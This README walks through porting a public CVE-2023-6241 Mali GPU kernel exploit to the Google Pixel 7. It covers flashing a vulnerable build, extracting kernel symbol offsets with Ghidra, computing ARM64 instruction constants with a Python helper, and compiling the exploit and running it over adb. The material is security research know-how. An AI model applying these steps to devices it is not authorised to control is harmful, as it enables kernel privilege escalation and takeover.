## https://sploitus.com/exploit?id=D599963B-C68C-536E-99F9-ED60BC0FE002
# CVE-2023-6241 for Google Pixel 7 
This repository illustrates how to adapt the exploit published by securitylab in its [GitHub repository](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2023_6241), which targets the Google Pixel 8, so that it works on a Google Pixel 7. 

Before modifying the exploit, it was assumed, based on the [article](https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/) associated with CVE-2023-6241, that the original exploit would also work on Google Pixel 7 devices once the necessary patches were applied. This assumption was needed because the two devices differ in hardware ([comparison](https://www.gsmarena.com/compare.php3?idPhone1=11903&idPhone2=12546)). 

## Tools
Here are the tools used to perform the analysis and extract information or files.
- [Ghidra](https://ghidra-sre.org/)
- [imjtool](https://newandroidbook.com/tools/imjtool.html) (used instead of [abootimg](https://github.com/ggrandou/abootimg), which did not seem to work with newer Android images)
- [vmlinux-to-elf](https://github.com/marin-m/vmlinux-to-elf)
- [Online Assembler and Disassembler](https://shell-storm.org/online/Online-Assembler-and-Disassembler/)
- [Android flash tool](https://flash.android.com/welcome)
- Android NDK and aarch64-linux-android34-clang compiler

## Workflow
The following describes, step by step, how the goal was achieved. 

1. Enable the developer options in the device.
   
2. Flash the device with the right security patch (in this case any build from [UP1A.231105.003, Nov 2023](https://developers.google.com/android/images#pantherup1a.231105.003) to [UQ1A.240205.002, Feb 2024](https://developers.google.com/android/images#pantheruq1a.240205.002), both included), for example using Google Chrome and the [Android flash tool](https://flash.android.com/welcome) by clicking "Flash" on the desired entry of the [Factory Images for Nexus and Pixel Devices](https://developers.google.com/android/images) page.\
   \
   **Note 1: using the Android flash tool to flash the device can help avoid problems related to the bootloader version. These problems may appear when flashing with the script provided in the archive downloaded by clicking "Link" on the [Factory Images for Nexus and Pixel Devices](https://developers.google.com/android/images) page.**\
   \
   **Note 2: before flashing the device, check "Force Flash all partition" in the Android flash tool to obtain the same result as the script.**

3. Download the desired Android image by clicking "Link" and extract the *boot.img* file from the compressed "*image-panther-\<release>.zip*" file inside the main archive "*panther-\<release>-factory-\<first 8 characters of SHA-256>.zip*".
4. Execute `./imjtool.ELF64 boot.img extract`. A new folder "*extracted*" is created, containing two files. ![imjtool-output](./imgs/imjtool-output.png)
5. Execute `vmlinux-to-elf ./extracted/kernel.decompressed <filename>.elf` (in the rest of this document `<filename>.elf` is `Pixel7-kernel.elf`). A new file with the given name is created. ![vmlinux-to-elf-output](./imgs/vmlinux-to-elf-output.png)
6. Open "*Pixel7-kernel.elf*" with Ghidra. It is not necessary to run the automatic analysis, since it takes a long time and the required information can be extracted without it.
7. Open the "*Symbol table*" window and search for the symbols of interest (in this case with the filter `avc_den|sel_read_enforce$|init_cred|^commit_creds$`). The result should look like this: ![SymbolTable](./imgs/symbol-table.png)
8. Go to the address of each symbol found and note its "*Imagebase Offset*".
   ![imagebase-offset](./imgs/imagebase-offset.png)
9. Set all the offsets in the exploit according to what has been found. \
   ![set-offset.png](./imgs/set-offset.png)
10. Compute the values of `ADD_COMMIT_2311` and `ADD_INIT_2311` by finding the hex encodings of `add x8, x8, #0xXXX` and `add x0, x0, #0xYYY` respectively, using the [Online Assembler and Disassembler](https://shell-storm.org/online/Online-Assembler-and-Disassembler/). `XXX` and `YYY` are simply the lowest 12 bits of the `commit_creds` and `init_cred` offsets respectively (e.g. if `COMMIT_CREDS_2311` is `0x17f0c8`, then the hex encoding of `add x8, x8, #0x0c8` is [0x91032108](https://shell-storm.org/online/Online-Assembler-and-Disassembler/?inst=add+x8%2C+x8%2C+%230x0c8&arch=arm64&as_format=hex#assembly)). \
    **Note that the values are shown in big-endian, so the resulting bytes need to be reversed**.
11. Copy `libGLES_mali.so` from the device (i.e. `adb pull /vendor/lib64/egl/libGLES_mali.so`) and compile everything with `/home/gobbo/Android/Sdk/ndk/26.1.10909125/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -g -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf`.\
    **Note: to stay consistent with the timeline, the OpenCL headers version used in the exploit was the newest available before the security patch that fixed the vulnerability (i.e. [version 2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17)).**
12. Upload and execute the exploit (the first command runs on the host, the remaining ones inside `adb shell` on the device):
    ```
    adb push ./mali_jit_csf /data/local/tmp
    adb shell
    # on the device:
    export LD_LIBRARY_PATH=/vendor/lib64/egl
    /data/local/tmp/mali_jit_csf
    ```
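As an added illustration of step 10 (this is not code from the original repository or from the securitylab exploit), the following Python snippet shows how the `add` immediate encoding behind `ADD_COMMIT_2311` and `ADD_INIT_2311` is built from the lowest 12 bits of a symbol offset, how to decode a constant back for verification, and why the four bytes come out reversed in memory. The offset `0x17f0c8` is the README's own example value, reused here as a constructed sample.

```python
import struct

# ARM64 `ADD Xd, Xn, #imm12` (64-bit, no shift) bit layout:
#   sf=1 op=0 S=0 100010 sh=0 imm12[21:10] Rn[9:5] Rd[4:0]
# which gives the base opcode 0x91000000 with the fields OR'ed in.
ADD_IMM64_BASE = 0x91000000
ADD_IMM64_MASK = 0xFFC00000  # covers sf/op/S/100010/sh


def encode_add_imm(rd: int, rn: int, imm12: int) -> int:
    """Encode `add x<rd>, x<rn>, #imm12` as a 32-bit instruction word."""
    if not (0 <= rd < 32 and 0 <= rn < 32):
        raise ValueError("register index must be in 0..31")
    if not (0 <= imm12 <= 0xFFF):
        raise ValueError("unshifted ADD (immediate) holds only 12 bits")
    return ADD_IMM64_BASE | (imm12 << 10) | (rn << 5) | rd


def add_from_symbol_offset(rd: int, rn: int, symbol_offset: int) -> int:
    """Keep the lowest 12 bits of a kernel symbol offset (the part an ADRP
    cannot supply) and produce the matching ADD instruction word."""
    return encode_add_imm(rd, rn, symbol_offset & 0xFFF)


def decode_add_imm(insn: int) -> tuple:
    """Return (imm12, rn, rd) so a constant copied into the exploit can be
    checked against the symbol offset it is supposed to reference."""
    if (insn & ADD_IMM64_MASK) != ADD_IMM64_BASE:
        raise ValueError("not an unshifted 64-bit ADD (immediate)")
    return ((insn >> 10) & 0xFFF, (insn >> 5) & 0x1F, insn & 0x1F)


def as_memory_bytes(insn: int) -> bytes:
    """AArch64 stores instructions little-endian: the word an assembler shows
    as 0x91032108 is laid out in memory as 08 21 03 91."""
    return struct.pack("<I", insn)


if __name__ == "__main__":
    commit_creds = 0x17F0C8  # constructed sample offset (README example)
    word = add_from_symbol_offset(8, 8, commit_creds)
    print(f"add x8, x8, #0x{commit_creds & 0xFFF:03x} -> 0x{word:08x}")
    print("memory bytes:", as_memory_bytes(word).hex())
    print("decoded (imm12, rn, rd):", decode_add_imm(word))
```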
More information can be found in the GitHub article and GitHub repository mentioned at the beginning.